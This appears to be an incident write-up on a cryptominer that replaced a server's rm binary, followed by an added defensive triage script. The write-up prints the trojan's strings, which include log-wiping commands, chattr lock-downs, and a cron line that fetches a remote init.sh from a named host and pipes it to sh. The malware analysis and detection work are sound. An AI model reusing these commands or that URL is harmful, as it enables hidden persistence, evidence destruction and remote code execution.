One of our servers was infected with a cryptominer. After killing the process and trying to delete its files, we found the files could not be deleted. We then suspected that the rm command itself was broken; a quick analysis confirmed that the command had been replaced. After swapping in a normal rm, deletion worked again and the miner was cleaned up.
MD5 of the tampered rm:
[root@testvm wakuang]# md5sum rm
f3eda9bab1244305d976c4f07b23ce4c rm
Running strings on the rm binary revealed the abnormal contents below (the original strings output, kept verbatim):
ulimit -d unlimited
ulimit -m unlimited
ulimit -s unlimited
ulimit -t unlimited
ulimit -v unlimited
ulimit -u unlimited
ulimit -n 1048000
popen %s error
echo 123 > /etc/velog
/etc/velog
/proc/self/exe
Failed
Error opening file
/usr/bin/wget
wget -P
-t 3 -T 20
/usr/bin/get
get -P
/usr/bin/curl
curl
--connect-timeout 10 --max-time 30 --retry 3 >
/usr/bin/url
url
ps -fe|grep
|grep -v grep|grep -v defunct
cat
error in fork:%s
error in exec function:%s
chattr -ia
chmod 777
chattr +ia
rm -f
setsid() failed (errno = %d)
chdir() failed (errno = %d)
history - c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
curl -fsSL --connect-timeout 30 --max-time 30 --retry 3
| sh
url -fsSL --connect-timeout 30 --max-time 30 --retry 3
pkill
chmod 000
echo 123aaa >>
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
dmidecode|grep "System Information" -A9
cat /proc/meminfo
free -m
df -h
ifconfig -a
dmidecode -t bios
strings /usr/lib64/libstdc++.so.6|grep GLIBCXX
cat /proc/uptime
cat /proc/version
lspci | grep Ethernet
top -n 1|head -n 5
cat /etc/issue
chattr -ia /var/spool/cron
chattr -ia /var/spool/cron/root
/var/spool/cron/root
echo >> /var/spool/cron/root
echo "*/6 * * * * curl -fsSL
| sh > /dev/null 2>&1 " >> '/var/spool/cron/root'
echo "*/6 * * * * url -fsSL
cat '/var/spool/cron/root' |grep init.sh
init.sh
chmod 644 /var/spool/cron/root
chattr +ia /var/spool/cron/root
chattr +ia /var/spool/cron
chattr +ia /etc/cron.d
/usr/bin/rmm
QsjeVXG9
http://w.lazer-n.com:43768/init.sh
Every time rm was executed it re-downloaded the miner and its cron jobs from the internet. We copied the command from another machine to replace it and restore rm's normal function, then modified the mining script and deleted all of its programs.
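The triage steps the post describes (hash-comparing the suspect rm against a copy from a clean host, and finding the cron entries that fetch a remote script and pipe it straight into sh) can be scripted. The helpers below are an added example, not code from the original post; the crontab lines and "binaries" they operate on are constructed test data, the download host is a placeholder, and the package-manager and lsattr checks are only run when those tools exist on the host.

```shell
#!/bin/sh
# Added example (not from the original post): helpers for triaging a host where
# rm is suspected of being replaced and cron is used for persistence.
# All inputs below are constructed for demonstration.

WORK=$(mktemp -d)

# Constructed crontab modelled on the strings found in the trojaned rm.
# EXAMPLE-PLACEHOLDER stands in for a download host; it is not an indicator.
cat > "$WORK/root.cron" <<'EOF'
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/6 * * * * curl -fsSL http://EXAMPLE-PLACEHOLDER/init.sh | sh > /dev/null 2>&1
*/6 * * * * url -fsSL http://EXAMPLE-PLACEHOLDER/init.sh | sh > /dev/null 2>&1
EOF

# Constructed stand-ins for a reference rm (from a clean host), an identical
# copy, and a suspect copy whose contents differ.
printf 'reference rm\n' > "$WORK/rm.ref"
cp "$WORK/rm.ref" "$WORK/rm.clean"
printf 'trojaned rm\n'  > "$WORK/rm.suspect"

# Count crontab lines that download with curl/wget/url and pipe the result
# into sh or bash. "url" is included because the trojan calls /usr/bin/url.
count_pipe_to_shell() {
    grep -cE '(^|[[:space:]])(curl|wget|url)[[:space:]].*\|[[:space:]]*(sh|bash)([[:space:]]|$)' "$1"
}

# Print the matching lines with line numbers for the analyst.
show_pipe_to_shell() {
    grep -nE '(^|[[:space:]])(curl|wget|url)[[:space:]].*\|[[:space:]]*(sh|bash)([[:space:]]|$)' "$1" || true
}

# Compare a suspect binary with a reference copy taken from a known-clean host,
# the same md5sum check the post used. Returns 0 when the hashes match.
binary_matches_reference() {
    [ "$(md5sum "$1" | cut -d' ' -f1)" = "$(md5sum "$2" | cut -d' ' -f1)" ]
}

# Ask the package manager whether a file still matches its package
# (rpm -Vf prints a line with flags such as S.5....T. for size/md5/mtime
# mismatches; dpkg -V prints ??5?????? for a checksum mismatch).
verify_with_package_manager() {
    if command -v rpm >/dev/null 2>&1; then
        rpm -Vf "$1"
    elif command -v dpkg >/dev/null 2>&1; then
        dpkg -V "$(dpkg -S "$1" | cut -d: -f1)"
    else
        echo "no rpm/dpkg found; compare against a known-clean copy instead" >&2
        return 2
    fi
}

# Report cron paths carrying the immutable (i) or append-only (a) attribute,
# which the trojan sets with chattr +ia; lsattr is Linux-specific, so skip if absent.
report_immutable() {
    command -v lsattr >/dev/null 2>&1 || return 0
    for p in "$@"; do
        [ -e "$p" ] || continue
        lsattr -d "$p" 2>/dev/null | grep -E '^[^ ]*[ia][^ ]* ' || true
    done
}

# Stand-alone run over the constructed data.
echo "suspicious cron lines: $(count_pipe_to_shell "$WORK/root.cron")"
show_pipe_to_shell "$WORK/root.cron"
if binary_matches_reference "$WORK/rm.suspect" "$WORK/rm.ref"; then
    echo "rm.suspect matches reference"
else
    echo "rm.suspect differs from reference"
fi
report_immutable /var/spool/cron /var/spool/cron/root /etc/cron.d
```

On a real host, point verify_with_package_manager at /bin/rm and report_immutable at the cron paths listed in the strings output; an rm that fails package verification, or cron files that an administrator cannot edit because of the i attribute, are the same signals the post found by hand.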